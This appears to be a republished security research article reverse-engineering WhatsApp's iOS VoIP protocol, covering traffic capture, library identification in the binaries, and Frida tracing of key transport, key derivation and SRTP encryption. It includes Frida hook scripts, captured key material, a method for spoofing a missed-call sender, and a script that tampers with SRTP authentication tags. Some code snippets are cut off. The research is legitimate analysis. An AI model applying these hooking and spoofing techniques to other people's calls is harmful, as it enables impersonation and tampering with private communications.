Analyzing WhatsApp Calls with Wireshark, radare2 and Frida

Original text by schirrmacher

In this article I want to demonstrate how I revealed parts of the WhatsApp VoIP protocol with the help of a jailbroken iOS device and a set of forensic tools. WhatsApp got a lot attention due to security vulnerabilities and hacks. So it is an interesting target for teaching security analysis.

While there is an official white paper describing the encryption of WhatsApp, there is no detailed overview of how its protocols work or how the security features are implemented. Consequently, there is no foundation for serious security related analysis.

My research is based on three steps:

  1. Analysis of the network traffic.
  2. Analysis of the binary files.
  3. Analysis of the runtime behavior.


I used the following tools for analyzing an iOS WhatsApp client:

How I installed a Jailbreak on my iOS device is out of scope.

Network Traffic Analysis

This part examines the network traffic of the WhatsApp client during a call, which was recorded with Wireshark. For recording the network traffic of the iOS device, I created a remote virtual network interface. The shell command is as follows (works on MacOS), where <deviceUUID> has to be replaced with the UUID of the inspected iOS device:

rvictl -s <device UUID>

Wireshark detects the usage of the Session Traversal Utilities for NAT (STUN). STUN is a signaling protocol which handles necessary steps for establishing a peer-to-peer connection between clients. There are also many TCP and UDP packets in the Wireshark recording, which could not be related with a high-level protocol.

TCP packets are exchanged between the inspected WhatsApp client and multiple WhatsApp servers. The UDP packets are exchanged between the caller and the callee. Hundreds of those UDP packets are sent within a minute. Since the WhatsApp white paper mentions the usage of the Secure Real Time Protocol (SRTP), it stands to reason that these UDP packets are SRTP packets containing the call data. The protocol provides encryption, message authentication and integrity, and protection against replay attacks to Real Time Protocol (RTP) packets.

The following listing shows an SRTP packet in hexadecimal representation, which was sent by the caller to the callee. It contains header fields from RTP, which forms the foundation of SRTP.

The first four bytes (red) contain seven RTP header fields. They can be inspected by looking at their binary representation:

0x8078001e =

0b10_0_0_0000_0_111100_00000000000011110 =


The first two bits contain the RTP version (V) which is equal to version two in this case. The third bit, the padding field (P), indicates that there is no padding included in the packet. The fourth bit, the extension field (X), indicates that no other header follows the fixed RTP header. Bits at position five to eight, the CSRC count (CC), show that no contributing source (CSRC) identifiers follow the fixed header. CSRCs are a list of identifiers indicating which sources contributed to the payload of an SRTP packet. Also the marker bit (M) at position 9 is set to zero. It can be used to mark frame boundaries of the packet stream. The next six bits contain the packet type (PT), which is equal to the decimal value 60 in this case. The given packet type is not defined by the RTP or SRTP standard. It might be a custom value chosen by WhatsApp. The last 17 bits contain the sequence number (SEQ) of the given packet. The RTP standard recommends to randomize the initial value of the sequence number. This recommendation is not applied by WhatsApp, since the packet sequence numbers are increased from zero, as can be seen from the Wireshark recordings. The next four bytes (blue) represent the timestamp of the packet. The four bytes after that (green) represent the synchronization source (SSRC). It is an identifier used for distinguishing call sessions running in parallel. The remaining bytes represent the payload. Probably the payload of the inspected packet contains audio data of the call.

We know that WhatsApp applies SRTP for protecting calls. This is confirmed by the structure of UDP packets exchanged between WhatsApp clients. The Wireshark recording shows that also TCP packets are sent from the iOS client to WhatsApp servers. These packets represent messages encrypted with the Noise Pipes Protocol, as we will see later.

Binary Analysis

The iOS WhatsApp client contains two main binary files: the WhatsApp application binary and the WhatsApp core framework. This part examines these binary files with the Hopper Disassembler and radare2. The binaries of iOS applications are encrypted when downloaded from the App Store. For analyzing the iOS WhatsApp client, the security measures of Apple were circumvented. A Jailbreak was installed on the inspected iOS device for accessing its files. Adding to this, the binary files of WhatsApp were decrypted with the tool bfdecrypt.

Here I demonstrate how I gathered information about underlying protocols, algorithms, and open source libraries WhatsApp uses. Open source libraries are especially interesting because they can easily be analyzed.


WhatsApp uses the libsignal-protocol-c open source library which implements the Signal Protocol. The protocol is based on the Double Ratchet Algorithm, which handles encryption of WhatsApp messages. The library was identified by the following function names in the binaries:

r2 WhatsAppCore
[0x0082b517]> / _signal_
Searching 8 bytes in [0x0-0x654000]
hits: 33
0x00837a7b hit2_0 .il_key_data_from_signal_keydispatch_.
0x0083df33 hit2_1 ._torlice_signal_protocol_paramet.
0x008407c0 hit2_2 .d_fac_3key_signal_message_big.
0x00840d50 hit2_3 .mmetric_signal_protocol_paramet.
0x00840e70 hit2_4 .ob_signal_protocol_paramet.
0x00841492 hit2_5 .pre_key_signal_messagesigna.
0x008de24b hit2_6 .agc_reset_alice_signal_protocol_paramet.
0x008de274 hit2_7 .rs_create_alice_signal_protocol_paramet.
0x008de440 hit2_8 .bitno_MRDTX_bob_signal_protocol_paramet.
0x008de467 hit2_9 .ters_create_bob_signal_protocol_paramet.
0x008e311c hit2_10 .pre_big_pre_key_signal_message_copy_pr.
0x008e3139 hit2_11 .ge_copy_pre_key_signal_message_create_.
0x008e3158 hit2_12 ._create_pre_key_signal_message_deserial.
0x008e317c hit2_13 .rialize_pre_key_signal_message_destroy.libsrtp


WhatsApp uses libsrtp for implementing the Secure Real Time Protocol. The symbol names of the library’s functions are stripped from the binaries. Despite, the application binary contains strings which reference libsrtp:

r2 WhatsApp
[0x1001ada34]> / libsrtp
0x100ee5546 hit1_0 .rc %08XUnknown libsrtp error %duns.
0x100ee57eb hit1_1 .d to initialize libsrtp: %sFailed to r.
0x100ee580a hit1_2 .led to register libsrtp deinit.Failed .
0x100ee5831 hit1_3 .to deinitialize libsrtp: %sAES_CM_128_.
0x100ee5883 hit1_4 .ck crypto Init libsrtp. create pool. .
0x100f07b80 hit1_5 . packet: %slibsrtpstat test%s: c.

Besides the binaries contain string constants which can also be found in the source code of libsrtp, like “cloning stream (SSRC: 0x%08x)”:

r2 WhatsApp
[0x1013ddb4f]> / cloning stream
Searching 14 bytes in [0x100000000-0x100fb4000]
hits: 1
0x100f07823 hit7_0 .sent!srtp%s: cloning stream (SSRC: 0x%08x).


WhatsApp uses PJSIP which implements multimedia communication, signaling and the encoding of audio and video data. Besides PJSIP implements STUN, which was also detected by the Wireshark recording. The library was identified by string constants in the binaries which contain debug information of PJSIP:

r2 WhatsApp
[0x1013ddb4f]> / pjmedia
Searching 7 bytes in [0x100000000-0x100fb4000]
hits: 180
0x100edd55f hit9_0 .io_piggyback.ccpjmedia_audio_piggyback.
0x100edd591 hit9_1 .r %d, stream %ppjmedia_audio_piggyback.
0x100edd5d4 hit9_2 .d, tx_packet %dpjmedia_audio_piggyback.
0x100edd601 hit9_3 .ideo_enabled %dpjmedia_audio_piggyback.
0x100eddcf3 hit9_4 .ibyuv converterpjmedia_converter_creat.
0x100eddd21 hit9_5 .rter count = %dpjmedia_converter_creat.
0x100ede3e3 hit9_6 .rame, status=%dpjmedia_delay_buf_get_s.
0x100ede46e hit9_7 .%sec_delay_bufpjmedia_echo_create2: %.
0x100ede64d hit9_8 .eUnknown pjmedia-videodev error .
0x100ede90c hit9_9 .o errorUnknown pjmedia-audiodev error .
0x100edebba hit9_10 .ATENCY)Unknown pjmedia error %dUnspec.
0x100ee027e hit9_11 .queue.format.cpjmedia_format_get_vide.
0x100ee02ca hit9_12 .mat info for %dpjmedia_format_get_vide.
0x100ee1446 hit9_13 .c_buf too shortpjmedia_h26x_packetize .

mbed TLS

WhatsApp applies mbed TLS which implements the TLS protocol. The library was identified by the following function names in the binaries:

r2 WhatsAppCore
[0x0082b517]> / mbedtls
Searching 7 bytes in [0x814000-0x934000]
hits: 41
0x008e299b hit5_0 .TLSErrorDomain_mbedtls_aes_crypt_cbc_.
0x008e29b2 hit5_1 ._aes_crypt_cbc_mbedtls_aes_crypt_cfb12.
0x008e29cc hit5_2 .s_crypt_cfb128_mbedtls_aes_crypt_cfb8.
0x008e29e4 hit5_3 .aes_crypt_cfb8_mbedtls_aes_crypt_ctr_.
0x008e29fb hit5_4 ._aes_crypt_ctr_mbedtls_aes_crypt_ecb_.
0x008e2a12 hit5_5 ._aes_crypt_ecb_mbedtls_aes_decrypt_mb.
0x008e2a27 hit5_6 .ls_aes_decrypt_mbedtls_aes_encrypt_mb.
0x008e2a3c hit5_7 .ls_aes_encrypt_mbedtls_aes_free_mbedt.
0x008e2a4e hit5_8 .edtls_aes_free_mbedtls_aes_init_mbedt.
0x008e2a60 hit5_9 .edtls_aes_init_mbedtls_aes_setkey_dec.
0x008e2a78 hit5_10 .aes_setkey_dec_mbedtls_aes_setkey_enc.
0x008e2a90 hit5_11 .aes_setkey_enc_mbedtls_cipher_auth_dec.
0x008e2aad hit5_12 .r_auth_decrypt_mbedtls_cipher_auth_enc.
0x008e2aca hit5_13 .r_auth_encrypt_mbedtls_cipher_check_ta.


WhatsApp uses Extensible Messaging and Presence Protocol (XMPP) for exchanging messages asynchronously between clients in the form of XML stanzas. This is supported by the fact that many class names in the binaries contain keywords relating to the protocol:

r2 WhatsApp
[0x1013ddb4f]> / XMPP
Searching 4 bytes in [0x1013ac000-0x1014b4000]
hits: 150
Searching 4 bytes in [0x100fb4000-0x1013ac000]
hits: 150
Searching 4 bytes in [0x100000000-0x100fb4000]
hits: 396
0x1013d05b5 hit12_0 .@_OBJC_CLASS_$_XMPPAckStanza@_.
0x1013d05d6 hit12_1 .@_OBJC_CLASS_$_XMPPBinaryCoder.
0x1013d05fa hit12_2 .@_OBJC_CLASS_$_XMPPCallStanza.
0x1013d0624 hit12_3 .@_OBJC_CLASS_$_XMPPChatStateStanza.
0x1013d064b hit12_4 .@_OBJC_CLASS_$_XMPPConnection.
0x1013d0679 hit12_5 .@_OBJC_CLASS_$_XMPPError.
0x1013d069e hit12_6 .@_OBJC_CLASS_$_XMPPGDPRDeleteReport.
0x1013d06cd hit12_7 .@_OBJC_CLASS_$_XMPPGDPRGetReportSta.
0x1013d0707 hit12_8 .@_OBJC_CLASS_$_XMPPGDPRRequestRepor.
0x1013d0736 hit12_9 .@_OBJC_CLASS_$_XMPPIQStanza.
0x1013d0762 hit12_10 .@_OBJC_CLASS_$_XMPPMessageStanza.
0x1013d0787 hit12_11 .@_OBJC_CLASS_$_XMPPMessageStatusCha.
0x1013d07b9 hit12_12 .@_OBJC_CLASS_$_XMPPMultiReceipt.
0x1013d07dc hit12_13 .@_OBJC_CLASS_$_XMPPNotificationStan.

Noise Protocol Framework

According to the WhatsApp white paper, the Noise Protocol Framework is used for securing the communication between clients and servers. The Noise Protocol Framework was developed for constructing easy-to-use cryptographic protocols from a set of small building blocks. To be more precisely, WhatsApp applies the Noise Pipes Protocol, which is derived from the Noise Protocol Framework. The following static string constants can be found in the WhatsApp binaries:

  • “Noise_XX_25519_AESGCM_SHA256”,
  • “Noise_IK_25519_AESGCM_SHA256”,
  • “Noise_XXfallback_25519_AESGCM_SHA256”.

These string constants describe handshake patterns implemented by WhatsApp clients. The first string is referenced within a class called WANoiseFullHandshake. The second string is referenced within a class called WANoiseResumeHandshake. The last string is referenced within a class called WANoiseFallbackHandshake. How these protocols work in detail is out of scope.

Runtime Analysis

This part examines the runtime behavior of the iOS WhatsApp client with the help of FridaFrida is a command line tool, which creates JavaScript hooks for functions of a mobile application. These hooks can be utilized for observing or manipulating parameters and return values of called functions.

Key Transport

This part outlines how the key transport of the WhatsApp VoIP protocol works. According to the WhatsApp white paper, for encrypting a VoIP call, the “initiator generates a random 32-byte SRTP master secret”. The caller then “transmits an encrypted message to the recipient that signals an incoming call, and contains the SRTP master secret”. These information are utilized for reconstructing the key transport, i.e. the transport of the master secret to the callee.

As a starting point, I traced functions containing the word “secret”:

frida-trace -U WhatsApp -m "*[* *Secret*]" -m "*[* *secret*]"

When a WhatsApp call is initiated, the method deriveSecretsFromInputKeyMaterial of the class WAHKDF is called:

deriveSecretsFromInputKeyMaterial: 0x121e08a20
salt: 0x0
info: 0x121e07840
outputLength: 0x2e
withMessageVersion: 0x3

The input values 0x121e08a20 and 0x121e07840 are pointers to Objective-C objects. Frida allows to create proxy Objective-C objects from pointers in JavaScript. The function hook of deriveSecretsFromInputKeyMaterial was used for printing debug descriptions of the objects:

  onEnter: function (log, args, state) {
    log("+[ WAHKDF deriveSecretsFromInputKeyMaterial: " + 
                    ObjC.Object( args[2] ).toString() + "\n" +
        " salt: " + ObjC.Object( args[3] ).toString() + "\n" +
        " info: " + ObjC.Object( args[4] ).toString() + "\n" +
        " bytes : " +              args[5].toInt32 () + "\n" +
        " withMessageVersion : " + args[6].toInt32 () + "\n]");

The output of the script can be seen in the following:

+[WAHKDF deriveSecretsFromInputKeyMaterial: <09a38e76 fe90e4f1 26ed66d0 5a6783ba d48776b6 1daaf7c9 39c005ea 2d8ccdf6> 
salt : nil
info : <34393135 39303537 37313632 3040732e 77686174 73617070 2e6e6574>
bytes: 46
withMessageVersion : 3

The first and third parameter seem to be NSData objects which contain a static byte buffer. The first parameter has the length of 32 bytes, like the master secret described in the WhatsApp white paper. The third parameter is an ASCII string representing the JID of the caller. We will see in the following that the first parameter is indeed the master secret.

Encryption of the Master Secret

According to the WhatsApp white paper, the master secret is essential for protecting a call session. This is why it has to be transported securely to the callee. For observing how the master secret is processed, I traced function calls containing key words relevant for encryption:

frida-trace -U WhatsApp -m "*[* *crypt*]" -i "*crypt*"

When a call is initiated, the function signal_encrypt of the libsignal-protocol-c library is called. The following shows the signal_encrypt function header:

 int signal_encrypt(signal_context *context,         signal_buffer **output,         
int cipher,         
const uint8_t *key, size_t key_len,         
const uint8_t *iv, size_t iv_len,         
const uint8_t *plaintext, size_t plaintext_len); 

The plaintext parameter was read with the Frida hook of signal_encrypt:

The first four bytes are used for serializing the master secret with protocol buffers. The following bytes represent the master secret. The last 13 bytes represent the encryption padding. I discovered that the plaintext is encrypted with AES-256 in CBC mode. The encryption keys are derived by the Double Ratchet Algorithm which is part of the Signal Protocol. The inner workings of libsignal-protocol-c and the Signal Protocol are not investigated in this article. The output of signal_encrypt is represented by the following bytes:

The output carries more bytes because an authentication tag is appended to the message, which is computed with HMAC-SHA256.

This part revealed the first part of the WhatsApp VoIP protocol. The master secret is serialized, padded and encrypted with a 256-bit AES key in CBC mode. The encryption key, the IV as well as the authentication key are derived by the libsignal-protocol-c library, which implements the Signal Protocol.

Preparing the Master Secret

In the following, I demonstrate how the encrypted master secret is processed. I traced functions containing the keyword “signal”:

frida-trace -U WhatsApp -i “*signal*”

The Frida command reveals that the function textsecure__signal_message__pack processes the encrypted master secret. The function creates a Signal message containing the encrypted master secret and parameters relevant for the Signal Protocol:

The gray bytes are used for serializing the Signal message. The blue bytes represent the sender ratchet key. The red byte represents the previous message counter. Then follows the message counter (orange). Finally, the encrypted master secret is represented by the following bytes (green) of the Signal message.

When tracing XMPP related Objective-C functions, we can see that a method named writeNoiseFrameToSocketWithPayload of the class XMPPStream is called. This method sends XMPP messages, which are encrypted with the Noise Pipes Protocol, via TCP to WhatsApp servers. I revealed the content of the payload parameter:

It is a binary XMPP message containing the Signal message created above. For disassembling the message, I traced a class named XMPPBinaryCoder. This class has a method called serialize which creates the binary representation of an XMPP stanza. When printing out its parameters, I can see a variety of key-value pairs which are added to the XMPP message:

-[XMPPBinaryCoder serialize: 
[call from=’49**********’
[offer call-id=’45D7827C624353A70084AED9B8C509D3’

[net medium=’3’]
[capability ver=’1’ {5b}]
[encopt keygen=’2’]
[enc v=’2’ type=’pkmsg’ {201b}]
] compressed: 0x0]

I was able to fake the indication of a missed call from Alice on Bob’s device, even though the call was initiated by Mallory. This was possible by overwriting the call-creator and from parameters with Alice’s JID. Although, the name of Mallory is shown in the message (“with Mallory”). When Bob responds to the notification, he starts a call with Alice instead of Mallory. I think that further research is required for analyzing the manipulation of the initial call message.

This part revealed how the encrypted master secret is processed by WhatsApp. The encrypted master secret is packed into a Signal message, which is added to a binary XMPP stanza. The XMPP stanza also contains the call ID and the JIDs of the caller and the callee.

Transmitting the Master Secret to the Callee

According to the WhatsApp white paper, “clients use Noise Pipes with Curve25519, AESGCM, and SHA256 from the Noise Protocol Framework for long running interactive connections”. When tracing functions containing key words relating to the Noise Protocol Framework, I can see that a class named WANoiseStreamCipher is used for encrypting traffic sent to WhatsApp servers. This class has a method called encryptPlaintext. The plaintext value after initiating a call is the XMPP message from above. The message is again encrypted with a function of the mbed TLS library called mbedtls_gcm_crypt_and_tag. Moreover mbedtls_gcm_setkey is called with a key size of 256 bit, which means that AES-256-GCM is applied. The encryption key is derived by the Noise Pipes Protocol, which is not investigated further in this article. The encrypted plaintext is sent via TCP to a WhatsApp server, which was revealed by the Wireshark recordings. The server then forwards the message to the callee for initiating the call.

Key Derivation

This part explains how the key material, used for encrypting WhatsApp calls, is created by a key derivation function (KDF). The results of this part are retrieved with the help of Frida by tracing a class called WAHKDF and the library libcommonCrypto. The WAHKDF class is applied for deriving keys, salts and nonces for initializing SRTP streams. Its method deriveSecretsFromInputKeyMaterial is called ten times before a call starts:

+[WAHKDF deriveSecretsFromInputKeyMaterial: <09a38e76 fe90e4f1 26ed66d0 5a6783ba d48776b6 1daaf7c9 39c005ea 2d8ccdf6>, salt: nil, info: <34393135 39303537 37313632 3040732e 77686174 73617070 2e6e6574>, bytes: 46, withMessageVersion: 3] => result: <4633c47f 94d5ed59 93a6dba8 514d5fb8 5092ba90 4256f8d3 4d56e72e 665bcd4c 5b6c418b db811e7f 84a70c83 f401>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <09a38e76 fe90e4f1 26ed66d0 5a6783ba d48776b6 1daaf7c9 39c005ea 2d8ccdf6>, salt: nil, info: <34393137 ******** ******** ******** ******** 6170702e 6e6574>, bytes: 46, withMessageVersion: 3] => result: <a174670a e25d8138 4de0ed3b f4ce7f76 c62c1d00 9ece6573 2ecb497b 1f6ed09c 18c444b9 c180fbd3 51713739 761c>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <00000000>, info: <34393135 39303537 37313632 3040732e 77686174 73617070 2e6e6574>, bytes: 4, withMessageVersion: 3] => result: <0ec654fd>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <01000000>, info: <34393135 39303537 37313632 3040732e 77686174 73617070 2e6e6574>, bytes: 4, withMessageVersion: 3] => result: <a060fa73>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <04000000>, info: <34393135 39303537 37313632 3040732e 77686174 73617070 2e6e6574>, bytes: 4, withMessageVersion: 3] => result: <b17d7f33>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <00000000>, info: <34393137 ******** ******** ******** ******** 6170702e 6e6574>, bytes: 4, withMessageVersion: 3] => result: <f51e66eb>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <01000000>, info: <34393137 ******** ******** ******** ******** 6170702e 6e6574>, bytes: 4, withMessageVersion: 3] => result: <ee328049>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <04000000>, info: <34393137 ******** ******** ******** ******** 6170702e 6e6574>, bytes: 4, withMessageVersion: 3] => result: <c75099f3>

The method creates encryption keys, salts and nonces based on the master secret and the JID of the call participants. The resulting values are used for initializing six SRTP streams, three for each call direction.

The following code snippet shows the reconstruction of the key derivation function written in JavaScript:

const crypto = require("crypto");

// master secret
const keyMaterial = new Buffer(
// JID param:
const info = "3439313539303537373136323040732e77686174736170702e6e6574";
const salt = new Buffer(
const initialKey = crypto.createHmac("sha256", salt)
const temp1 = crypto.createHmac("sha256", initialKey)
                    .update(new Buffer(info + "01", "hex"))
const temp2 = new Buffer(temp1.toString("hex") + info + "02", "hex");
const temp3 = crypto.createHmac("sha256", initialKey)
const result = Buffer.concat([temp1, temp3.slice(0, 14)]);

// 4633c47f94d5ed5993a6dba8514d5fb85092ba904256f8d34d56e72e665bcd4c5b6c418bdb811e7f84a70c83f401

This code snippet represents the key derivation for initializing a single SRTP stream. The input parameters and the function’s output were recorded with Frida. For reconstructing the KDF algorithm, the inputs and outputs of hash functions from the libcommonCrypto library were analyzed. Three HMAC-SHA256 computations are applied for deriving the final key. I found out that the KDF is based on RFC 5869.

Call Initialization

SRTP, which is implemented by libsrtp, is applied by WhatsApp for encrypting audio data exchanged between WhatsApp clients during a VoIP call. Unfortunately, the symbols of the libsrtp library are stripped from the WhatsApp binaries. This is why we cannot trace the library’s functions by their symbol name. Instead, I followed a different approach for analyzing functions of the libsrtp library.

Many functions of the libsrtp library contain debug statements, which carry information about internal library processing. These debug statements were utilized for identifying functions of the library. I searched for string constants in the data segment of the WhatsApp binaries which can also be found in libsrtp. Then I searched for function bodies in the binaries, which are referencing these string constants. When I identified a function of libsrtp in the binaries, I copied the first 12 bytes of its hexadecimal representation. Then I used Frida for searching the hexadecimal representation in memory. This way I revealed the function’s start address which can be traced by Frida.

As an example, I explain how I revealed the usage of a libsrtp library function called srtp_aes_icm_context_init. This function is used for initializing encrypted SRTP streams, based on AES-ICM. The other functions which are analyzed in this part were traced by applying the same methodology.

The implementation of srtp_aes_icm_context_initcontains two debug statements:

debug_print(srtp_mod_aes_icm, "key:  %s",
            srtp_octet_string_hex_string(key, base_key_len));
debug_print(srtp_mod_aes_icm, "offset: %s", v128_hex_string(&c->offset));

We can see that the string constants in the debug_print calls occur as references in the application binaries of WhatsApp. When searching the reference location, it is possible to associate the string constants with a function which encloses them. The function containing the references was revealed with the Hopper Disassembler:

int sub_100bbda00(int arg0, int arg1) {
  r31 = r31 - 0x60;
  var_30 = r24;
  stack[-56] = r23;
  var_20 = r22; 
  stack[-40] = r21;
  var_10 = r20;
  stack[-24] = r19; 
  saved_fp = r29;
  stack[-8] = r30;
  r19 = arg0;
  sub_100bbf094(arg0, arg1 + 0x10);
  r20 = r19 + 0x10;
  sub_100bbf094(r20, arg1 + 0x10);
  *(int16_t *)(r19 + 0x1e) = 0x0;
  *(int16_t *)(r19 + 0xe) = 0x0;
  if (*(int32_t *)dword_1012b5760 != 0x0) {
    sub_100bc085c(0x7, "%s: key:  %s\n");
    if (*(int32_t *)0x1012b5760 != 0x0) {
      sub_100bc085c(0x7, "%s: offset: %s\n");
  sub_100bbbffc(&var_40, r19 + 0x30);
  *(int32_t *)(r19 + 0xe0) = 0x0;
  return 0x0;

Line 19 and 22 contain the references to the debug string constants. When the location of the target function within the WhatsApp binaries is known, we still have to search its memory location at runtime. This is because Address Space Layout Randomization (ASLR) is applied on iOS devices. Functions change their addresses every time a mobile application is launched.

The following code snippet demonstrates how srtp_aes_icm_context_init can be located at runtime:

const apiResolver = new ApiResolver("objc");
const resolvedMatches = apiResolver.enumerateMatches(
  "+[NSURL URLWithUnicodeString:]"

const SCAN_SIZE = 100000;
const scanStart = resolvedMatches[0].address;
const scanResults = Memory.scanSync(
  // first bytes of the hexadecimal representation of srtp_aes_icm_context_init
  "FF 83 01 D1 F8 5F 02 A9 F6 57 03 A9"

// srtp_err_status_t srtp_aes_icm_context_init(void *cv, const uint8_t *key)
const targetPointer = ptr(scanResults[0].address);
const targetFunction = new NativeFunction(targetPointer, "int", [

console.log("scan start: " + scanStart);
console.log("srtp_aes_icm_context_init: " + scanResults[0].address);

Interceptor.attach(targetFunction, {
  onEnter: function(args) {
      static srtp_err_status_t srtp_aes_icm_context_init(void *cv, const uint8_t *key)
      typedef struct {
          v128_t counter;                        holds the counter value         
          v128_t offset;                         initial offset value            
          v128_t keystream_buffer;               buffers bytes of keystream      
          srtp_aes_expanded_key_t expanded_key;  the cipher key                  
          int bytes_in_buffer;                   number of unused bytes in buffer
          int key_size;                          AES key size + 14 byte SALT
      } srtp_aes_icm_ctx_t;

    console.log("srtp_aes_icm_context_init " + args[0] + " key:");
      hexdump(args[1], {
        offset: 0,
        length: 16
  onLeave: function(args) {}

The ApiResolver by Frida is applied for finding a known memory location (as an anchor), where I start a linear memory search. I use functions as an anchor, which are located closely to the target function in the binaries and have a symbol name. If a function has a symbol name, it can easily be traced with Frida. This is why URLWithUnicodeString was traced in line 3. When the anchor has been found, its location is used for starting a linear search in memory. The value of SCAN_SIZE should be chosen depending on the distance between the anchor and the target function. Line 12 contains the first 12 bytes of the target function as a hexadecimal value. Finally, a NativeFunction is created in line 17, which can be traced with Frida if the hexadecimal pattern is found. The function accepts two parameters: a pointer to the encryption context (cv) and a pointer to the encryption key (key). Before a call is started, srtp_aes_icm_context_init is called six times for initializing six SRTP streams. Two streams receive the master secret from above as key parameter.

The streams are encrypted with AES-ICM. The purpose of all streams is not clear. There is also a function called srtp_aes_icm_alloc, which was identified by the string constant “allocating cipher with key length %d”. The function accepts a key length parameter which has the value of 16 bytes for every stream. As a result, AES-128-ICM is applied for encrypting the SRTP streams. Despite the fact that 46 bytes are derived with the key derivation function, only 30 bytes are actually used for initializing the first two streams. When overwriting the remaining 16 bytes in memory, the call between two WhatsApp clients still works. This shows that these 16 bytes are not used at all!

Call Encryption

There is a function called srtp_aes_icm_encrypt which is part of the libsrtp library. This function encrypts SRTP streams of WhatsApp clients based on AES-128-ICM. The function was identified by a reference to the following string constant in a debug statement: “block index: %d”.

The following represents the hexadecimal output of a single SRTP packet encrypted with srtp_aes_icm_encrypt:

The meaning of the first 12 bytes (red) was already explained above. The following bytes (blue) represent the actual SRTP payload. The last four bytes represent an authentication tag, which is investigated below. As there are six SRTP streams, there have to be different kind of payloads. I could not identify the actual payload content transported by each stream.

Call Integrity

This part explains how the integrity of SRTP packets is protected. The libsrtp library contains a function named srtp_hmac_compute. This function computes authentication tags for SRTP packets exchanged between WhatsApp clients. srtp_hmac_compute could be located and traced with Frida by searching for a reference to the string constant found in the function’s implementation: “intermediate state: %s”.

The function header of srtp_hmac_computecan be seen in the following:

static srtp_err_status_t srtp_hmac_compute(void *statev,
                                           const uint8_t *message,
                                           int msg_octets,
                                           int tag_len,
                                           uint8_t *result)

srtp_hmac_compute applies HMAC-SHA1 for computing authentication tags. By tracing the function with Frida, I revealed the input message and the output result, as well as the value of tag_len for each sent SRTP packet. The following logs show the tag_len and the message parameters of srtp_hmac_compute during a call:

search srtp_hmac_compute in memory from: 0x1016380ac
found srtp_hmac_compute at: 0x10163b5f4

tag_len: 10
message: 81 ca 00 07 fe 67 2e 32 56 14 89 75 c5 c0 39 4a d3 a0 cd 48 8c 4b 61 8a 78 32 a7 89 1e b7 71 26 80 00 00 01

tag_len: 4
message: 00 00 00 00

tag_len: 10
message: 81 d0 00 02 fe 67 2e 32 b5 6f 93 8e 80 00 00 02

tag_len: 4
message: 00 00 00 00

tag_len: 4
message: 00 00 00 00

tag_len: 4
message: 00 00 00 00

tag_len: 4
message: 00 00 00 00

tag_len: 10
message: 81 ca 00 07 83 42 f3 44 81 78 9f f5 39 b1 23 50 48 19 e0 f1 61 5b b5 32 dc b3 10 08 e7 47 a8 4b 80 00 00 01

tag_len: 10
message: 81 d0 00 02 83 42 f3 44 94 60 21 fe 80 00 00 02

tag_len: 4
message: 00 00 00 00

tag_len: 4
message: 00 00 00 00

tag_len: 10
message: 81 c8 00 12 fe 67 2e 32 87 b7 69 f8 5a 27 4c 76 b4 29 f6 5d 59 26 de af bd e9 4c 8b f3 ff 48 e3 a9 7e 62 cf db 9c 8a 3d 34 50 48 f8 fc 0e 88 7a 17 eb 17 94 9f 3d 91 27 89 d5 cc bd 21 ea 01 39 27 e1 05 07 66 69 1f 68 08 53 1a 18 02 9e bc 50 ed 8e 40 3e 8a 7b d3 b6 19 e8 54 6f 6b 58 ac 4e e3 25 f5 c2 e8 1c 97 bb 46 f9 38 45 80 00 00 03


There are two things I noticed:

  1. SRTP packets with a tag length of four bytes are authenticated incorrectly. The message parameter does not contain the actual SRTP packet. Instead, the constant value of four zero bytes is used for computing the authentication tag. However, when the tags of these packets are manipulated, the call is terminated after a few seconds. Maybe my observation that the authentication tag is computed incorrectly is not right, or the packet manipulation I made was invalid (because the packet encoding was destroyed).
  2. Streams which are authenticated with a tag length of ten bytes seem to be authenticated in a right way, i.e. the packets are input to the srtp_hmac_compute function as message parameter. Despite, the authentication tags are not checked for integrity during a VoIP call session. The following code snippet shows how I have overridden the authentication tags of SRTP packets which have an authentication tag of ten bytes:
const scanStart = new ApiResolver("objc").enumerateMatches(
  "+[NSURL URLWithUnicodeString:]"

console.log("search srtp_hmac_compute in memory from: " + scanStart);

const size = 100000;
const matches = Memory.scanSync(
  // first bytes of the hexadecimal representation of srtp_hmac_compute
  "E0 03 16 AA 4C 00 00 94 D5 02 01 91"
const targetPtr = ptr(matches[0].address);
console.log("found srtp_hmac_compute at: " + matches[0].address);

const targetFunction = new NativeFunction(targetPtr, "int", [

const manipulatedTag = Memory.alloc(MANIPULATABLE_TAG_SIZE);
manipulatedTag.writeByteArray([0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0]);

Interceptor.attach(ptr(targetFunction), {
  onEnter: function(args) {
      static srtp_err_status_t srtp_hmac_compute(void *statev,
                                                       const uint8_t *message,
                                                       int msg_octets,
                                                       int tag_len,
                                                       uint8_t *result)
    console.log("srtp_hmac_compute tag (" + args[3].toInt32() + "):");
    const tag_len = args[3].toInt32();
    if (tag_len === MANIPULATABLE_TAG_SIZE) {
        hexdump(args[1], {
          length: args[2].toInt32()
      args[3] = 0;

When executing the Frida script at runtime, the VoIP call still works. Hence, integrity protection of these SRTP packets is broken. The consequences of this finding are unknown, since I could not reveal what these streams are actually used for. This behavior has to be analyzed more precisely.


This article revealed fundamental parts of the WhatsApp VoIP protocol. I demonstrated how the analysis of network traffic, binary application files and the dynamic runtime behavior of WhatsApp clients helped to reveal protocol steps.

The results of my analysis are the following:

  • WhatsApp applies open source libraries like libsignal-protocol-clibsrtpPJSIP and mbed TLS for implementing the VoIP protocol.
  • A value called “master secret” is used for initializing two SRTP streams, which encrypt payloads with AES-128-ICM. The master secret is used as input for a key derivation function (HKDF), which derives keys, salts and nonces as initialization parameters for SRTP.
